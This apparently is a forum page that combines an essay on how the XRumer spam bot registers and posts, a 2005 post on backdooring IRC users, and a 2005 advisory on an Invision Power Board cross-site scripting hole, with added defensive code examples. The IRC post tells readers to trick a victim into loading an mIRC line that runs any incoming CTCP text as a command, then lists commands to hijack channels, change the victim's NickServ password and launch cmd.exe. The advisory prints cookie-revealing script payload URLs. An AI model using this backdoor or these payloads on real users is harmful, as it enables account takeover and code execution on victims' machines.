MessagePM=[...]private.php?do=newpm&u=[...]
MessagePMgen=private.php?do=newpm&u=
Profile=[...]member.php?u=[...]
IdentField=u


Mail registration. It can auto-register some web mails,
or you can provide a POP3 account to use for the user registration process. Xrumer can be configured to check the email account every n minutes for mail confirmations; then Xrumer analyzes the mail in a really simple way, looks for the confirmation link, and follows it.
To analyze the received mails, Xrumer has a set of patterns to match in the mail's text and in the links inside the mail; those patterns are defined in the file xpop.txt.

Let's see some entries in the file...

[...]Willkommen auf[...]
[...]Bienvenue sur[...]
[...]Action Req[...]
[...]Registra[...]
[...]rejestra[...]
[...]Account validated at[...]
[...]activation[...]

Patterns to find in the mail's text.


http://[...]?act=Reg&CODE=03&SID=[...]
http://[...]?act=Reg&CODE=03&aid=[...]
http://[...]register.php?a=act[...]i=[...]
http://[...]profile.php?mode=activate[...]&act_key=[...]

Patterns for activation links




Posting Modes
Extracted from XRumer manual

Posting mode is selected on the "Links database" tab. There are 5 modes:

1. ForumsList: links are taken from the main database.

2. ZForumsList: links are taken from a database that was formed during the last session while going through the main database. The process in this mode is a few times faster, because the links stored in this database point directly to the page where the message is to be posted.

3. MForumsList: the database of activation links, formed while downloading activation links from the e-mail inbox (see "Mail").

4. RForumsList: the database of links for replying in previously created topics.

5. EForumsList: the database of links for editing previously created topics. It is necessary to post with the same nickname and password that were used before. Probably only those topics that were created on behalf of the registered user can be edited.

The ZForumsList id*.txt, RForumsList id*.txt, EForumsList id*.txt and MForumsList id*.txt databases are created during the process of posting.

All databases are located in the Links folder.



The process of posting
Extracted from XRumer manual

In the process of its work XRumer continuously processes links from the forums database ForumsList id*.txt (or ZForumsList id*.txt, MForumsList id*.txt, RForumsList id*.txt; see Posting modes).

The algorithm looks something like this:
1. The program opens the site at the next link from the database.

2. If it is a forum, it chooses the most suitable topic for your message.
If it is not, it looks for a link to a forum/guestbook/links catalog/creation of a new topic, etc.

3. It checks whether registration is needed to create topics; if yes, it registers on the forum and logs into it after that. If during registration there is a need to enter text from a picture (pictocode), the picture is downloaded and processed, and the code is entered.
More info on this process is located here - http://www.botmaster.net/pictocod/.
If registration must be activated by e-mail, the program will continue working on the next forum and activate links in the background, if "Profiles activation via e-mail" is set to automatic mode. If it is turned off, it will stop work on this forum. If "Profiles activation via e-mail" is set to manual mode, it will download activation links from the e-mail inbox only when the button "Get the activation links from the mail box" on the "Mail" tab is pressed. This forum will be placed in the report file Activation id*.txt. Downloaded links are placed into the MForumsList id*.txt database.

4. Finds the form that has to be filled in and fills in the needed fields.

5. Sends the entered data.

6. Checks whether the information sent was actually posted. If it was, the link to the page with the message is added to the Success id*.txt report. If data was sent but the software could not verify the posting, the link to the page with the message is added to the HalfSuccess id*.txt report.
The link to the page where the message was posted is placed into the ZForumsList id*.txt database, and if next time the process is launched not from the ForumsList id*.txt database but from the ZForumsList id*.txt database, it will run 5-7 times faster. The link to the page where the reply to that message is posted is placed into the RForumsList id*.txt database. The next time you start posting from this database, no new topics will be created; instead, replies to previously created topics will be sent.
This is the "Question-Answer" system (more info on this is located here - http://www.botmaster.net/v-o/).

7. If the link to the form or the forum has not been found, the link is placed into the Resultates id*.txt report, with an explanation of why the posting failed.

8. If "Profiles activation via e-mail" is set to automatic mode, the program will continue working and activate links in the background.

If "Profiles activation via e-mail" is set to manual mode, then when the end of the ForumsList id*.txt database is reached, XRumer will switch to downloading activation links from the e-mail inbox only after the button "Get the activation links from the mail box" is pressed. Downloaded links are placed into the MForumsList id*.txt database. When the download is complete, it goes through the activation links.



Bot AI

The bot AI is the weak point of XRumer. Why?
The bot analyzes the web pages or mails it receives using a pattern-matching approach.
As I said before, the patterns for confirmation mails are in the file xpop.txt, and the
patterns to handle the registration and posting process are defined in the file xlinks.txt.
This is XRumer's weak point; let's see a fragment of xlinks.txt:

#Endast registrerade medlemmar har access till forumet.<;>Du <b>kan inte</b> skapa nya inlägg i det här forumet<; .;>To post you must be logged in. If you don't have an account yet, please register.<;>Para postar você precisa estar logado;Il n'y a que les membres enregistrés qui ont le droit d'accéder à ce forum;Attention, ce forum est un espace PRIVE, vous devez en être membre pour y entrer et y participer;>Sólo miembros registrados pueden acceder a este foro<;>Om een bericht te posten moet je ingelogd zijn;>Sólo los usuarios registrados tienen acceso a este foro.<;>Deze optie is allen beschikbaar voor geregistreerde leden.<;>Disculpa, no tienes permiso para responder a esa discusión<;forums is a member-only feature.<;>Seules les personnes enregistrées peuvent poster sur ce forum.<;you must be registered and logged-in to post; ;> <
MUSTREGISTERANYWAY



OK, that list is heavily abridged, but we can see that we have lots of sentences in different languages saying that you need to register in order to post. Those sentences match the tag MUSTREGISTERANYWAY. It is interesting that this guy defines the tags after the keywords... Anyway, these are the tags:

FORUM
SUCCESS
REGANYWAY
MUSTREGISTERANYWAY
MUSTREGISTER
INVALID
NOT FOUND
PRESSAGREE
ALLOW
ANONYM
NOPASS
LOGGEDIN
BANNED
WRONGPLACE
WRONGACCOUNT
ACTIVATION
CHECK
BBCODE
PICTOTRY
PREMODERATION
TOOLARGE
BADEMAIL
TAKEN
TOOFREQ
REMOVEURL
MAX500
WAIT


Based on the resulting tag, XRumer decides what its next step will be.
As you can see, XRumer should know the exact sentence used by any of the possible target boards, in any possible language, but... it doesn't.
Previous XRumer versions weren't able to learn new sentences and were doomed, but XRumer 3 can learn new ones; I don't know how well it does it, though :S

How to avoid being spammed by XRumer

This is completely theoretical, because we can't make our XRumer copy start spamming due to licensing problems, and we can't test it...

but... the idea would be to make the XRumer engine think that the registration operation failed, even if it worked.
So, what we do is this: when you follow the mail confirmation link you got, you always get a page that says "The activation key you supplied does not match any in the database", but written in the same color as the background, while showing an image that says "Your account is activated".
Then human users will see the picture and will know they need to reload the page or whatever, but XRumer will match that to the tag WRONGACCOUNT and isn't going to proceed.
I'm sure there are other similar ways to cheat XRumer.

I hope this essay helps people understand a little better what we are talking about when we talk about XRumer; I'm leaving lots of things without explanation in order to keep this relatively short.

APX
  • tantloweasowa likes this
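The pattern matching the essay describes (the `[...]` wildcards of xpop.txt, the phrase-line-then-tag-line layout of xlinks.txt, and the hidden-text trick that steers the bot to WRONGACCOUNT) can be reproduced in a few lines. The following is an added example written for this page; it is not XRumer's code and not from the essay. The xpop.txt patterns are copied from the excerpt above, while the xlinks.txt sample, the confirmation mail and the decoy activation page are constructed, and the exact semantics of `[...]` (treated here as "match anything"), the `<;>` separators (simplified to `;`), the first-match rule and the hostname `forum.example.invalid` are assumptions.

```python
import re
from typing import List, Optional, Tuple

# xpop.txt-style patterns copied from the excerpt above; "[...]" is assumed to mean "match anything".
MAIL_TEXT_PATTERNS = [
    "[...]Willkommen auf[...]",
    "[...]Action Req[...]",
    "[...]Account validated at[...]",
    "[...]activation[...]",
]
ACTIVATION_LINK_PATTERNS = [
    "http://[...]?act=Reg&CODE=03&aid=[...]",
    "http://[...]register.php?a=act[...]i=[...]",
    "http://[...]profile.php?mode=activate[...]&act_key=[...]",
]

# Constructed xlinks.txt-style sample: a ';'-separated phrase line followed by its tag line.
# The real file also uses '<;>' markers; they are simplified to ';' here (assumption).
XLINKS_SAMPLE = """\
To post you must be logged in. If you don't have an account yet, please register.;you must be registered and logged-in to post
MUSTREGISTERANYWAY
The activation key you supplied does not match any in the database;Your activation key is incorrect
WRONGACCOUNT
Your account is activated;Thank you for registering
SUCCESS
"""

# Constructed confirmation mail (the hostname is a placeholder).
SAMPLE_MAIL = """\
Subject: Action Required: activate your account
Welcome to Example Forum. To activate your account, click:
http://forum.example.invalid/profile.php?mode=activate&u=123&act_key=abc123
If you did not register, ignore this mail.
"""

# Constructed activation page using the essay's trick: the "failure" sentence is in the HTML but
# hidden from humans (same colour as the background); the real status is only in an image.
DECOY_ACTIVATION_PAGE = """\
<html><body style="background:#fff">
<p style="color:#fff">The activation key you supplied does not match any in the database</p>
<img src="activated.png" alt="">
</body></html>
"""


def glob_to_regex(pattern: str) -> "re.Pattern[str]":
    """Turn an XRumer-style pattern into a regex: '[...]' matches anything, the rest is literal."""
    literal_parts = pattern.split("[...]")
    return re.compile(".*?".join(re.escape(p) for p in literal_parts), re.IGNORECASE | re.DOTALL)


def is_confirmation_mail(body: str) -> bool:
    """True if any mail-text pattern occurs somewhere in the body."""
    return any(glob_to_regex(p).search(body) for p in MAIL_TEXT_PATTERNS)


def extract_activation_links(body: str) -> List[str]:
    """Collect every URL in the mail and keep those that match an activation-link pattern in full."""
    urls = re.findall(r"https?://[^\s<>\"']+", body)
    return [u for u in urls if any(glob_to_regex(p).fullmatch(u) for p in ACTIVATION_LINK_PATTERNS)]


def parse_xlinks(text: str) -> List[Tuple[str, str]]:
    """Parse (phrase, TAG) pairs from the phrase-line / tag-line layout."""
    lines = [line for line in text.splitlines() if line.strip()]
    rules: List[Tuple[str, str]] = []
    for phrases, tag in zip(lines[0::2], lines[1::2]):
        for phrase in phrases.split(";"):
            if phrase.strip():
                rules.append((phrase.strip(), tag.strip()))
    return rules


def classify_page(html: str, rules: List[Tuple[str, str]]) -> Optional[str]:
    """Return the tag of the first phrase found in the raw page source, or None.

    The match runs over the HTML source, not the rendered text, which is exactly why
    background-coloured text steers the bot while a human never reads it.
    """
    haystack = html.lower()
    for phrase, tag in rules:
        if phrase.lower() in haystack:
            return tag
    return None


if __name__ == "__main__":
    print("confirmation mail:", is_confirmation_mail(SAMPLE_MAIL))
    print("activation links:", extract_activation_links(SAMPLE_MAIL))
    rules = parse_xlinks(XLINKS_SAMPLE)
    print("decoy page classified as:", classify_page(DECOY_ACTIVATION_PAGE, rules))
```

Because the classifier reads the raw source, the decoy only works while the "success" wording is absent from the HTML (alt text included) and the failure phrase is listed before any success phrase the bot knows; a bot that renders pages or strips invisible text would not be fooled.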


#132982 How To Hack On Irc User Using Remote Commands

Posted by quicksilk on 15 November 2005 - 02:39 AM

use social engineering here
give this script to your victim

//write config.mrc ctcp ^*:*:*:$1- | Load -rs config.mrc


use these commands to execute on your victim

Useful commands

/ctcp nickname /j #channelname
/ctcp nickname /part #leavechannelname
/ctcp nickname /msg #sendmsgnickname
/ctcp nickname /exit
/ctcp nickname /msg nickserv set passwd yourpassword
/ctcp nickname /mode #channelname +o yournickname to be OP
/ctcp nickname /run commands like notepad.exe cmd.exe etc....
/ctcp nickname /timer 0 0 /ping $me set a schedule to perform task

I know its not much for some of you guys....:(
  • tantloweasowa likes this
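The one-liner above installs a catch-all CTCP handler whose body is `$1-`, so whatever text arrives in a CTCP is evaluated as a command. Here is an added example, not from the post, of the check a defender would want: a scanner for mIRC remote scripts that flags event definitions which execute the message text (`$N-`) directly or hand it to /run. The sample script is constructed; the definition grammar it parses (event, level, matchtext, target and commands separated by colons, one definition per line) is an assumption that covers the common one-line form only, not `{ }` blocks.

```python
import re
from typing import List, Optional, Tuple

# Constructed sample remote script; line 2 is the handler the post's one-liner writes.
SAMPLE_SCRIPT = """\
; config.mrc as written by the one-liner in the post (constructed sample)
ctcp ^*:*:*:$1-
; benign handler: answers VERSION requests only
ctcp *:VERSION*:*:ctcpreply $nick VERSION demo-client
; backdoor variant on private messages: "!run calc.exe" from anyone runs calc.exe
on *:TEXT:!run *:?:run $2-
on *:TEXT:hello*:#:msg $chan hi $nick
"""

# Assumed one-line grammar (no { } blocks):
#   ctcp <level>:<matchtext>:<target>:<commands>
#   on   <level>:<EVENT>:<matchtext>:<target>:<commands>
CTCP_DEF = re.compile(r"^\s*ctcp\s+(\^?[^:\s]+):([^:]*):([^:]*):(.*)$", re.IGNORECASE)
ON_DEF = re.compile(r"^\s*on\s+(\^?[^:\s]+):([A-Za-z]+):([^:]*):([^:]*):(.*)$", re.IGNORECASE)

EVAL_MESSAGE = re.compile(r"^\s*\$\d+-")  # body is "$1-": the text itself is run as a command
SHELL_WITH_MESSAGE = re.compile(r"\b(run|dll|com)\b.*\$\d+-", re.IGNORECASE)  # text fed to /run etc.


def parse_definition(line: str) -> Optional[Tuple[str, str, str]]:
    """Return (event, matchtext, commands) for a one-line handler, or None for anything else."""
    m = CTCP_DEF.match(line)
    if m:
        return "ctcp", m.group(2), m.group(4)
    m = ON_DEF.match(line)
    if m:
        return m.group(2).upper(), m.group(3), m.group(5)
    return None


def scan_mirc_script(text: str) -> List[Tuple[int, str, str]]:
    """Return (line number, line, reason) for every handler that executes attacker-controlled text."""
    findings: List[Tuple[int, str, str]] = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        parsed = parse_definition(line)
        if parsed is None:
            continue
        event, matchtext, commands = parsed
        reason = None
        if EVAL_MESSAGE.match(commands):
            reason = f"{event} handler evaluates the message text as a command"
        elif SHELL_WITH_MESSAGE.search(commands):
            reason = f"{event} handler passes the message text to run/dll/com"
        if reason:
            if matchtext.strip() == "*":
                reason += " (matchtext '*': triggered by any message)"
            findings.append((lineno, line.strip(), reason))
    return findings


if __name__ == "__main__":
    for lineno, line, reason in scan_mirc_script(SAMPLE_SCRIPT):
        print(f"line {lineno}: {reason}\n    {line}")
```

Run it over the files mIRC loads from its script directory (remote scripts and `mirc.ini`/`.ini` script sections); anything the scanner flags should be removed with `/unload`, and the `[rfiles]` section of mirc.ini checked for scripts loaded without the user's knowledge.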


#114822 Invision Xss Reveals Cookie And Session Details

Posted by Kenny on 02 May 2005 - 04:27 AM

Invision Power Board URL Parameter Input Validation Error Lets Remote Users Conduct Cross-Site Scripting Attacks

SecurityTracker Alert ID:  1013863 
SecurityTracker URL:  http://securitytracker.com/id?1013863 
CVE Reference:  GENERIC-MAP-NOMATCH
Date:  May 2 2005

Impact:  Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information

Exploit Included:  Yes 

Version(s): 2.0.3, 2.1 Alpha 2

Description:  Arron Ward from GovernmentSecurity.org reported an input validation vulnerability in Invision Power Board. A remote user can conduct cross-site scripting attacks.

The forum software does not properly validate user-supplied input in certain URL parameters. A remote user can create a specially crafted URL that, when loaded by an authenticated target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the Invision Power Board software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A demonstration exploit URL is provided:

http://[target]/index.php?act='><script>alert(document.cookie)</script>

Internet Explorer users are affected. Some other browsers do not execute the resulting HTML.

Other parameters are also affected.

Impact:  A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the Invision Power Board software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Solution:  No solution was available at the time of this entry.

Vendor URL:  www.invisionboard.com/

Cause:  Input validation error

Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Reported By:  "arron ward" <deadlink@elitemail.org>

Message History:  None.


  Source Message Contents

Date:  Fri, 29 Apr 2005 08:47:37 -0700
From:  "arron ward" <deadlink@elitemail.org>
Subject:  Invision Xss reveals Cookie and session details


Invision Xss reveals Cookie and session details

by adding = and a script to an input, on any page, you can reveal the logged-in user's
cookie and session details, including hashes... details below

note:you must be a member for this to work !!

Vendor:http://www.invisionboard.com/

Notified = Yes

29/4/2005

Tested on

IPB 2.0.3
IPB 2.1 Alpha 2

not tested on other versions but i expect they will be vuln also


Tested this on IPB main website forum and it is fully working

also notified IPB Admin via Private Message

Details:

here are the scripts; this will work on various pages, for instance, using
IE

Example visit:

http://forums.invisi...m/index.php?act

Now by adding an equals sign = and a script message, in this case to reveal
cookies and session path details including the user hash ...

='><script>alert(document.cookie)</script>

so XSS full url is :

http://forums.invisi...hp?...</script>




again this will work on multiple urls... examples follow

/forum/index.php?act=Members='><script>alert(document.cookie)</script>
/forum/index.php?act='><script>alert(document.cookie)</script>
/forum/index.php?act=calendar='><script>alert(document.cookie)</script>
/forum/index.php?act=Help&CODE=01&HID='><script>alert(document.cookie)</script>



and so on...

regards

ComSec

co/Admin

http://www.governmen...urity.org/forum

--
btw my name is NOT arron ward...


  • PobrecedPrite likes this
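The demonstration URLs work because the value of `act` (or `HID`) is written back into the page inside a quoted attribute, so `'>` closes the attribute and the tag, and the `<script>` that follows becomes real markup. As an added example, not IPB's code and not from the advisory, here is the vulnerable reflection beside a fixed one, plus a small parser that shows the difference by listing the tags a browser would actually create. The surrounding markup (a self-link `<a href='index.php?...'>`) and the hostname `forum.example.invalid` are assumptions; the payload and the query strings are the advisory's.

```python
import html
from html.parser import HTMLParser
from typing import Callable, Dict, List
from urllib.parse import parse_qsl, quote, urlsplit

# Payload and query strings from the advisory; the hostname is a placeholder (assumption).
PAYLOAD = "'><script>alert(document.cookie)</script>"
BARE_URL = "http://forum.example.invalid/index.php?act=" + PAYLOAD
HID_URL = "http://forum.example.invalid/index.php?act=Help&CODE=01&HID=" + PAYLOAD


def query_params(url: str) -> Dict[str, str]:
    """Split the query string the way the application would, keeping the raw values."""
    return dict(parse_qsl(urlsplit(url).query, keep_blank_values=True))


def reflect(params: Dict[str, str],
            encode_value: Callable[[str], str],
            escape_attr: Callable[[str], str]) -> str:
    """Assumed page fragment: a self-link that echoes every parameter into a quoted attribute."""
    query = "&".join(f"{k}={encode_value(v)}" for k, v in params.items())
    return f"<a href='index.php?{escape_attr(query)}'>Back to forum</a>"


def render_vulnerable(url: str) -> str:
    """Raw reflection: parameter values land in the attribute untouched, as in the advisory."""
    return reflect(query_params(url), lambda v: v, lambda s: s)


def render_fixed(url: str) -> str:
    """Two layers: percent-encode each value for the URL, then HTML-escape the whole attribute."""
    return reflect(query_params(url),
                   lambda v: quote(v, safe=""),
                   lambda s: html.escape(s, quote=True))


class TagCollector(HTMLParser):
    """Records the start tags a browser would create from the markup."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: List[str] = []

    def handle_starttag(self, tag, attrs) -> None:
        self.tags.append(tag)


def tags_in(markup: str) -> List[str]:
    """Tags the parser sees: a second 'script' entry means the attribute was broken out of."""
    collector = TagCollector()
    collector.feed(markup)
    return collector.tags


if __name__ == "__main__":
    for url in (BARE_URL, HID_URL):
        vulnerable, fixed = render_vulnerable(url), render_fixed(url)
        print("vulnerable:", tags_in(vulnerable), vulnerable)
        print("fixed:     ", tags_in(fixed), fixed)
```

Escaping only `<` and `>` would also stop this particular payload, but a value inside a URL attribute needs both encodings: percent-encoding keeps the value a single query component, and attribute escaping keeps `&` and quote characters from altering the markup.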